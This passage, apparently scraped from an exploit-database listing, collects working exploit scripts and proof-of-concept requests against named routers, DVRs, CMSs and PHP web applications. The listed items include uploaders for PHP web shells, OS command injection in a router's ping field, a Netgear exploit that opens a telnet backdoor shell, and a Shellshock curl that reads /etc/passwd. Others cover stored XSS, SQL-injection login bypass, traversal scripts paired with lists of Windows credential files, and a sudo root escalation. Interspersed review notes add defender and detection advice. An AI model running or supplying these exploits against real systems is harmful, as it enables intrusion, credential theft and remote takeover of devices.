protected]","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"} userlogin={"uemail":"[email protected]","password":"Grow_with_hackerctf","login":"LOG IN"} shelldata={"fname":"a","lname":"l","uname":"l","email":"[email protected]","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + 
Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.get(URL) response = ShellSession.post(URL + "admin/index.php",data=authdata) response = ShellSession.post(URL + "admin/regester.php",data=createuser) response = ShellSession.post(URL,data=userlogin) response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")}) location = URL +"img/" + filename #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())
  # NOTE(review): single collapsed line; flat script, usage ricon.py [ip] [cmd]. The POST
  # to /apply.cgi submits the web UI's "netTest" form (submit_class=admin,
  # submit_button=netTest, action=Apply, is_ping=0) with ping_server_ip set to
  # ';' + cmd, using HTTP basic auth admin/admin; the output is then scraped from
  # /asp/admin/netTest.asp with a regex on the <textarea> body
  # (re.search(...).group(1) raises AttributeError when nothing matches).
  # Defender notes: the advisory text (ZSL-2021-5653) describes an authenticated OS
  # command injection via 'ping_server_ip' running as the admin (root) user on firmware
  # 16.10.3 of the S9922XL/S9922L, and separately a Heartbleed exposure. The script
  # hard-codes the factory credentials, so changing them removes its precondition; the
  # durable fix is vendor-side validation of ping_server_ip (an IP/hostname pattern, no
  # shell interpolation) and keeping the management interface off untrusted networks.
  # Detection: POST /apply.cgi with submit_button=netTest and shell metacharacters in
  # ping_server_ip, followed by a GET of /asp/admin/netTest.asp.
  8. # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.riconmobile.com #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Ricon Industrial Cellular Router S9922XL Remote Command Execution # # # Vendor: Ricon Mobile Inc. # Product web page: https://www.riconmobile.com # Affected version: Model: S9922XL and S9922L # Firmware: 16.10.3 # # Summary: S9922L series LTE router is designed and manufactured by # Ricon Mobile Inc., it based on 3G/LTE cellular network technology # with industrial class quality. With its embedded cellular module, # it widely used in multiple case like ATM connection, remote office # security connection, data collection, etc. # # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi # and VPN technologies. Powerful 64-bit Processor and integrated real-time # operating system specially developed by Ricon Mobile. S9922XL is # widely used in many areas such as intelligent transportation, scada, # POS, industrial automation, telemetry, finance, environmental protection. # # Desc: The router suffers from an authenticated OS command injection # vulnerability. This can be exploited to inject and execute arbitrary # shell commands as the admin (root) user via the 'ping_server_ip' POST # parameter. Also vulnerable to Heartbleed. 
# # -------------------------------------------------------------------- # C:\>python ricon.py 192.168.1.71 id # uid=0(admin) gid=0(admin) # -------------------------------------------------------------------- # # Tested on: GNU/Linux 2.6.36 (mips) # WEB-ROUTER # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5653 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php # # # 02.07.2021 # import requests,sys,re if len(sys.argv)<3: print("Ricon Industrial Routers RCE") print("Usage: ./ricon.py [ip] [cmd]") sys.exit(17) else: ipaddr=sys.argv[1] execmd=sys.argv[2] data={'submit_class' :'admin', 'submit_button' :'netTest', 'submit_type' :'', 'action' :'Apply', 'change_action' :'', 'is_ping' :'0', 'ping_server_ip':';'+execmd} htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin')) htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin')) reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n') print(reout)
  # NOTE(review): single collapsed line; three functions plus a __main__ guard.
  #   login()      POST lang/p_userid/p_password to /textpattern/index.php with
  #                verify=False (TLS certificate verification disabled); "success" is
  #                decided by status_code == 200, after which session.cookies['txp_login']
  #                is read (KeyError if that cookie was not set)
  #   get_token()  GET ?event=plugin, take the third <script> element, strip the
  #                "var textpattern = " prefix and the last character (presumably the
  #                trailing ';'), json.loads the rest and return its '_txp_token'
  #   upload()     multipart POST (event=plugin, step=plugin_upload, install_new=Upload,
  #                _txp_token) whose 'theplugin' part is a random 10-letter name + ".php"
  #                holding an HTML form that passes $_GET['cmd'] to system(); the random
  #                name is echoed in an HTML comment so its presence in the response body
  #                is taken as confirmation, and the file is then expected at
  #                /textpattern/tmp/<name>.php
  # Defender notes: this requires valid Textpattern credentials with plugin-upload rights,
  # so the bar is an admin account; the weakness is that plugin_upload accepts an
  # arbitrary .php file name and leaves the content in a web-served tmp/ directory.
  # Fixes are application-side (validate the plugin package format before writing it,
  # write under a server-chosen non-executable name or outside the web root) and
  # server-side (no PHP execution under textpattern/tmp/). Detection: a step=plugin_upload
  # POST whose theplugin filename ends in .php, then a GET of textpattern/tmp/*.php.
  9. # Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) # Date: 07/04/2021 # Exploit Author: Mevlüt Akçam # Software Link: https://github.com/textpattern/textpattern # Vendor Homepage: https://textpattern.com/ # Version: 4.9.0-dev # Tested on: 20.04.1-Ubuntu #!/usr/bin/python3 import requests from bs4 import BeautifulSoup as bs4 import json import string import random import argparse # Colors RED="\033[91m" GREEN="\033[92m" RESET="\033[0m" parser = argparse.ArgumentParser() parser.add_argument('-t', '--url', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') args = parser.parse_args() URL=args.url uname=args.user passwd=args.password session=requests.Session() def login(uname,passwd): data={'lang':'en','p_userid':uname,'p_password':passwd} r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False) if r_login.status_code == 200: print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET) else: print(RED,f"[-] Login failed",RESET) exit() def get_token(): print(GREEN,f"[+] Getting token ",RESET) r_token=session.get(URL+"/textpattern/index.php?event=plugin") soup = bs4(r_token.text, 'html.parser') textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1] textpattern = json.loads(textpattern) return textpattern['_txp_token'] def upload(): file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10)) file={ 'theplugin':( file_name+".php", """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> </pre> </body> </html> <!-- """+file_name+" -->" ),# The file_name is used to verify that the file has 
been uploaded. 'install_new':(None,'Upload'), 'event':(None,'plugin'), 'step':(None,'plugin_upload'), '_txp_token':(None,get_token()), } r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file) if file_name in r_upload.text: print(GREEN,f"[+] Shell uploaded",RESET) print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET) else: print(RED,f"[-] Shell failed to load",RESET) print(RED,f"[-] Bye",RESET) exit() if __name__=="__main__": login(uname,passwd) upload() print(GREEN,f"[+] Bye",RESET)
  10. # Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10 Vulnerable page: /clients/profile POC: ---- POST /clients/profile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 Content-Length: 1548 Origin: http://localhost Connection: close Referer: http://localhost/clients/profile Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 Upgrade-Insecure-Requests: 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="firstname" adfgsg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="lastname" fsdgfdg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="company" test -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="vat" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="phonenumber" -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="country" 105 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="city" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; 
name="address" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="zip" 313 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="state" ""><body onload=alert("XSS")>"> -----------------------------325278703021926100783634528058-- The payload is stored in the "state" field; when any user subsequently opens the profile page, the XSS executes in their browser.
  11. # Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. # CVE: CVE-2021-42071 # Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/ # An unauthenticated remote attacker can inject arbitrary commands into a CGI script, which can result in remote command execution. curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
  12. # Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgear.com/ # Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL ([email protected]) Date: 02.07.2021 Status: Patched in some models Version: All prior to v1.0.0.60 Impact: Critical CVE: No CVE number assigned PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 References: 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 The exploit script only works on UNIX-based systems. This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. """ import sys import requests import os target_ip = "192.168.0.1" telnet_port = 666 sent = False def main(): if len(sys.argv) < 3: print "./dgn2200_pwn.py <router ip> <backdoor-port>" exit() target_ip = sys.argv[1] telnet_port = int(sys.argv[2]) print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." send_payload() print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." print "[!] If it fails to connect it means the target is probably not vulnerable" spawn_shell() def send_payload(): try: requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") sent = True except Exception: sent = False print "[-] Unknown error, target might not be vulnerable." 
def spawn_shell(): if sent: print "[+] Dropping a shell..." os.system("telnet " + target_ip + " " + telnet_port) else: exit() if __name__ == "__main__": main()
  13. # Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv[1] payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
  14. # Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html # Version: V 1.0 # Tested on: Linux & Windows import requests import random import string from bs4 import BeautifulSoup let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) randstr = ''.join(random.choice(let) for i in range(15)) payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" url = input("Target : ") session = requests.session() reqUrl = url + "login.php" reqHead = {"Content-Type": "application/x-www-form-urlencoded"} reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} session.post(reqUrl, headers=reqHead, data=reqData) print("Shell Uploading...") reqUrl = url + "php_action/createProduct.php" reqHead = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} reqData = "\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productImage\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; 
name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition: form-data; name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n" session.post(reqUrl, headers=reqHead, data=reqData) print("product name is "+randstr) print("shell name is "+shellname) reqUrl = url + "product.php" data = session.get(reqUrl) parser = BeautifulSoup(data.text, 'html.parser') find_shell = parser.find_all('img') for i in find_shell: if shellname in i.get("src"): print("Shell URL : " + url + i.get("src") + "?cmd=whoami")
  15. # Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal # Date: 06 July 2021 # Original Author: Emre ÖVÜNÇ # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://palletsprojects.com/ # Software Link: https://github.com/pallets/werkzeug # Version: Prior to 0.15.5 # Tested on: Windows Server # CVE: 2019-14322 # Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 # Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ Description : Prior to 0.15.5, it was possible for a third party to access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment containing a drive name replaces the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames, leading to arbitrary file download.
#!/usr/bin/env python3 # PoC code by @faisalfs10x [https://github.com/faisalfs10x] """ $ pip3 install colorama==0.3.3, argparse, requests, urllib3 $ python3 CVE-2019-14322.py -l list_target.txt" """ import argparse import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import requests from colorama import Fore, Back, Style, init # Colors red = '\033[91m' green = '\033[92m' white = '\033[97m' yellow = '\033[93m' bold = '\033[1m' end = '\033[0m' init(autoreset=True) def banner_motd(): print(Fore.CYAN +Style.BRIGHT +""" CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s """ % (bold, red, white, yellow, white, end)) banner_motd() # list of sensitive files to grab in windows # %windir%\repair\sam # %windir%\System32\config\RegBack\SAM # %windir%\repair\system # %windir%\repair\software # %windir%\repair\security # %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) # %windir%\iis6.log (5,6 or 7) # %windir%\system32\logfiles\httperr\httperr1.log # C:\sysprep.inf # C:\sysprep\sysprep.inf # C:\sysprep\sysprep.xml # %windir%\Panther\Unattended.xml # C:\inetpub\wwwroot\Web.config # %windir%\system32\config\AppEvent.Evt (Application log) # %windir%\system32\config\SecEvent.Evt (Security log) # %windir%\system32\config\default.sav # %windir%\system32\config\security.sav # %windir%\system32\config\software.sav # %windir%\system32\config\system.sav # %windir%\system32\inetsrv\config\applicationHost.config # %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml # %windir%\System32\drivers\etc\hosts (dns entries) # %windir%\System32\drivers\etc\networks (network settings) # %windir%\system32\config\SAM # TLDR: # C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml # C:/windows/system32/inetsrv/config/applicationHost.config # C:/windows/system32/logfiles/httperr/httperr1.log # C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account) # C:/windows/system32/drivers/etc/hosts - 
(dns entries) # C:/windows/system32/drivers/etc/networks - (network settings) def check(url): # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) for endpoint in [ 'https://{}/base_import/static/c:/windows/win.ini', #'https://{}/web/static/c:/windows/win.ini', #'https://{}/base/static/c:/windows/win.ini' ]: try: url2 = endpoint.format(url) resp = requests.get(url2, verify=False, timeout=5) if 'fonts' and 'files' and 'extensions' in resp.text: print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") with open('CVE-2019-14322_result.txt', 'a+') as output: output.write('{}\n'.format(url2)) output.close() else: print(" [-] " +url+ " : not vulnerable") except KeyboardInterrupt: exit('User aborted!') except: print(" [-] " +url+ " : not vulnerable") def main(args): f = open(listfile, "r") for w in f: url = w.strip() check(url) if __name__ == '__main__': try: parser = argparse.ArgumentParser(description='CVE-2019-14322') parser.add_argument("-l","--targetlist",required=True, help = "target list in file") args = parser.parse_args() listfile = args.targetlist main(args) except KeyboardInterrupt: exit('User aborted!')
  16. # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux # Proof of Concept : 1- Send Request to /pages/save_user.php. 2- Find your shell.php file path and try any command. ################################## REQUEST ############################### POST /pages/save_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 Content-Length: 369 -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="btn_save" -----------------------------3767690350396265302394702877-- ################################## RESPONSE ############################# HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 02:16:18 GMT Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.3.28 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 ################################## Exploit ############################# <?php // Coder By Thamer Almohammadi(@Thamerz88); function exploit($scheme,$host,$path,$shell){ $url=$scheme."://".$host.$path; $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" 
type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>'; $data = "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; $data .= "\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; $packet .= $data; $packet .= "\r\n"; send($host, $packet); sleep(2); check($url,$shell); } function send($host, $packet) { if ($connect = @fsockopen ($host, 80, $x, $y, 3)) { @fputs ($connect, $packet); @fclose ($connect); } } function check($url,$shell){ $check=file_get_contents($url."/uploadImage/Profile/".$shell); $preg=preg_match('/(File To Upload)/', $check, $output); if($output[0] == "File To Upload"){ echo "[+] Upload shell successfully.. :D\n"; echo "[+] Link ". 
$url."/uploadImage/Profile/".$shell."\n"; } else{ //Exploit Failed echo "[-] Exploit Failed..\n"; } } $options=getopt("u:s:"); if(!isset($options['u'], $options['s'])) die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n -u http://target.com = Target URL .. -s shell.php = Shell Name ..\n\n"); $url=$options["u"]; $shell=$options["s"]; $parse=parse_url($url); $host=$parse['host']; $path=$parse['path']; $scheme=$parse['scheme']; exploit($scheme,$host,$path,$shell); ?>
  17. # Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. #An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. sudo mount -o bind /bin/sh /bin/mount sudo mount
  18. # Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi) # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC # ########### Request: ======== POST /osms/Execute/ExLogin.php HTTP/1.1 Host: localhost Content-Length: 43 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Username=or+1%3D1%2F*&Password=or+1%3D1%2F* Payload: ========= Username=or 1=1/* Password=or 1=1/*
  19. # Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal # Date: 05.07.2021 # Exploit Author: TheSmuggler # Vendor Homepage: https://gotmls.net/ # Software Link: https://gotmls.net/downloads/ # Version: <= 4.20.72 # Tested on: Windows import requests print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
  20. # Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1: # ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; 
name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET['rev']); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2: # ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close 
